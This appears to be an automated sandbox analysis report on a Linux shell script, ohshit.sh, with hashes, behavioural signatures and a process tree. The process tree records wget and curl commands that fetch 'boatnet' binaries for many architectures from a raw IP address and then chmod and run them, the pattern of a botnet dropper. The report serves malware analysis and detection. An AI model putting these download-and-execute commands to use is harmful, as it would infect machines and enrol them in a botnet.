Analysis
max time kernel: 60s
max time network: 64s
platform: ubuntu-24.04_amd64
resource: ubuntu2404-amd64-20240523-en
resource tags: arch:amd64, arch:i386, image:ubuntu2404-amd64-20240523-en, kernel:6.8.0-31-generic, locale:en-us, os:ubuntu-24.04-amd64, system
submitted: 31-08-2024 21:05
Static task: static1
Behavioral task: behavioral1 (Sample: ohshit.sh, Resource: debian12-armhf-20240418-en)
Behavioral task: behavioral2 (Sample: ohshit.sh, Resource: debian12-mipsel-20240729-en)
Behavioral task: behavioral3 (Sample: ohshit.sh, Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral4 (Sample: ohshit.sh, Resource: debian9-mipsbe-20240611-en)
Behavioral task: behavioral5 (Sample: ohshit.sh, Resource: debian9-mipsel-20240611-en)
Behavioral task: behavioral6 (Sample: ohshit.sh, Resource: ubuntu1804-amd64-20240508-en)
Behavioral task: behavioral7 (Sample: ohshit.sh, Resource: ubuntu2004-amd64-20240729-en)
Behavioral task: behavioral8 (Sample: ohshit.sh, Resource: ubuntu2204-amd64-20240611-en)
General
Target: ohshit.sh
Size: 2KB
MD5: fefdf2b7ece4d55bd47778b420f84011
SHA1: 2823096e0538910f9b57ff9bae007ec655520fc3
SHA256: 3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
SHA512: b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Signatures
Executes dropped EXE (12 IoCs)
ioc       pid   Process
/tmp/WTF  2828  WTF
/tmp/WTF  2837  WTF
/tmp/WTF  2846  WTF
/tmp/WTF  2859  WTF
/tmp/WTF  2869  WTF
/tmp/WTF  2908  WTF
/tmp/WTF  2926  WTF
/tmp/WTF  2945  WTF
/tmp/WTF  2979  WTF
/tmp/WTF  2991  WTF
/tmp/WTF  3001  WTF
/tmp/WTF  3011  WTF
Loads a kernel module (64 IoCs)
Loads a Linux kernel module, potentially to achieve persistence.
pid   Process
2828  WTF
2828  WTF
2828  WTF
2828  WTF
2828  WTF
2828  WTF
2828  WTF
2828  WTF
2829  Process not Found
2829  Process not Found
2830  Process not Found
2831  Process not Found
2833  Process not Found
2829  Process not Found
2837  WTF
2837  WTF
2837  WTF
2837  WTF
2837  WTF
2838  Process not Found
2838  Process not Found
2838  Process not Found
2839  Process not Found
2840  Process not Found
2837  WTF
2837  WTF
2837  WTF
2841  Process not Found
2846  WTF
2846  WTF
2846  WTF
2846  WTF
2846  WTF
2846  WTF
2846  WTF
2846  WTF
2847  Process not Found
2847  Process not Found
2847  Process not Found
2848  Process not Found
2849  Process not Found
2850  Process not Found
2829  Process not Found
2829  Process not Found
2853  Process not Found
2838  Process not Found
2838  Process not Found
2854  Process not Found
2847  Process not Found
2847  Process not Found
2855  Process not Found
2829  Process not Found
2829  Process not Found
2856  Process not Found
2859  WTF
2859  WTF
2859  WTF
2859  WTF
2859  WTF
2859  WTF
2859  WTF
2859  WTF
2860  Process not Found
2860  Process not Found
resource                         yara_rule
behavioral9/files/fstream-1.dat  upx
Reads runtime system information (13 IoCs)
Reads data from /proc virtual filesystem.
description              ioc                            Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
Writes file to tmp directory (25 IoCs)
Malware often drops required files in the /tmp directory.
description                   ioc                  Process
File opened for modification  /tmp/boatnet.mips    curl
File opened for modification  /tmp/boatnet.arc     wget
File opened for modification  /tmp/boatnet.x86_64  wget
File opened for modification  /tmp/boatnet.ppc     wget
File opened for modification  /tmp/boatnet.ppc     curl
File opened for modification  /tmp/boatnet.mpsl    wget
File opened for modification  /tmp/boatnet.mpsl    curl
File opened for modification  /tmp/boatnet.arm5    wget
File opened for modification  /tmp/boatnet.arm6    wget
File opened for modification  /tmp/boatnet.i468    curl
File opened for modification  /tmp/boatnet.arm5    curl
File opened for modification  /tmp/boatnet.mips    wget
File opened for modification  /tmp/boatnet.arc     curl
File opened for modification  /tmp/boatnet.x86_64  curl
File opened for modification  /tmp/boatnet.arm7    curl
File opened for modification  /tmp/boatnet.spc     curl
File opened for modification  /tmp/boatnet.x86     curl
File opened for modification  /tmp/boatnet.arm6    curl
File opened for modification  /tmp/boatnet.arm7    wget
File opened for modification  /tmp/boatnet.spc     wget
File opened for modification  /tmp/boatnet.x86     wget
File opened for modification  /tmp/WTF             ohshit.sh
File opened for modification  /tmp/boatnet.i686    curl
File opened for modification  /tmp/boatnet.arm     wget
File opened for modification  /tmp/boatnet.arm     curl
cURL User-Agent (13 IoCs)
Uses User-Agent string associated with cURL utility.
description            flow  ioc
HTTP User-Agent header  6    curl/8.5.0
HTTP User-Agent header  15   curl/8.5.0
HTTP User-Agent header  34   curl/8.5.0
HTTP User-Agent header  37   curl/8.5.0
HTTP User-Agent header  43   curl/8.5.0
HTTP User-Agent header  9    curl/8.5.0
HTTP User-Agent header  19   curl/8.5.0
HTTP User-Agent header  22   curl/8.5.0
HTTP User-Agent header  30   curl/8.5.0
HTTP User-Agent header  40   curl/8.5.0
HTTP User-Agent header  3    curl/8.5.0
HTTP User-Agent header  12   curl/8.5.0
HTTP User-Agent header  27   curl/8.5.0
Processes
Process tree (depth in brackets; path | command line | PID)
[1] /tmp/ohshit.sh | /tmp/ohshit.sh | PID:2819
    - Writes file to tmp directory
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.x86 | PID:2821
      - Writes file to tmp directory
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.x86 | PID:2822
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/cat | cat boatnet.x86 | PID:2826
  [2] /usr/bin/chmod | chmod +x WTF boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:2827
  [2] /tmp/WTF | ./WTF | PID:2828
      - Executes dropped EXE
      - Loads a kernel module
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.mips | PID:2832
      - Writes file to tmp directory
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.mips | PID:2834
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/chmod | chmod +x WTF boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:2836
  [2] /tmp/WTF | ./WTF | PID:2837
      - Executes dropped EXE
      - Loads a kernel module
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.arc | PID:2842
      - Writes file to tmp directory
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.arc | PID:2843
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/chmod | chmod +x WTF boatnet.arc boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:2845
  [2] /tmp/WTF | ./WTF | PID:2846
      - Executes dropped EXE
      - Loads a kernel module
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.i468 | PID:2851
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.i468 | PID:2852
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/chmod | chmod +x WTF boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:2858
  [2] /tmp/WTF | ./WTF | PID:2859
      - Executes dropped EXE
      - Loads a kernel module
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.i686 | PID:2864
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.i686 | PID:2865
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/chmod | chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:2868
  [2] /tmp/WTF | ./WTF | PID:2869
      - Executes dropped EXE
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.x86_64 | PID:2874
      - Writes file to tmp directory
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64 | PID:2880
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/chmod | chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:2907
  [2] /tmp/WTF | ./WTF | PID:2908
      - Executes dropped EXE
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.mpsl | PID:2913
      - Writes file to tmp directory
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl | PID:2917
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/chmod | chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:2925
  [2] /tmp/WTF | ./WTF | PID:2926
      - Executes dropped EXE
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.arm | PID:2931
      - Writes file to tmp directory
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.arm | PID:2941
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/chmod | chmod +x WTF boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:2944
  [2] /tmp/WTF | ./WTF | PID:2945
      - Executes dropped EXE
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.arm5 | PID:2950
      - Writes file to tmp directory
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.arm5 | PID:2951
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/chmod | chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:2978
  [2] /tmp/WTF | ./WTF | PID:2979
      - Executes dropped EXE
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.arm6 | PID:2984
      - Writes file to tmp directory
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.arm6 | PID:2985
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/chmod | chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:2990
  [2] /tmp/WTF | ./WTF | PID:2991
      - Executes dropped EXE
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.arm7 | PID:2996
      - Writes file to tmp directory
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.arm7 | PID:2997
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/chmod | chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:3000
  [2] /tmp/WTF | ./WTF | PID:3001
      - Executes dropped EXE
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.ppc | PID:3006
      - Writes file to tmp directory
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.ppc | PID:3008
      - Reads runtime system information
      - Writes file to tmp directory
  [2] /usr/bin/chmod | chmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf | PID:3010
  [2] /tmp/WTF | ./WTF | PID:3011
      - Executes dropped EXE
  [2] /usr/bin/wget | wget http://94.156.71.225/hiddenbin/boatnet.spc | PID:3016
      - Writes file to tmp directory
  [2] /usr/bin/curl | curl -O http://94.156.71.225/hiddenbin/boatnet.spc | PID:3019
      - Reads runtime system information
      - Writes file to tmp directory
Network
MITRE ATT&CK Matrix
Downloads
Filesize: 36KB
MD5: ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1: 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256: 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512: 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d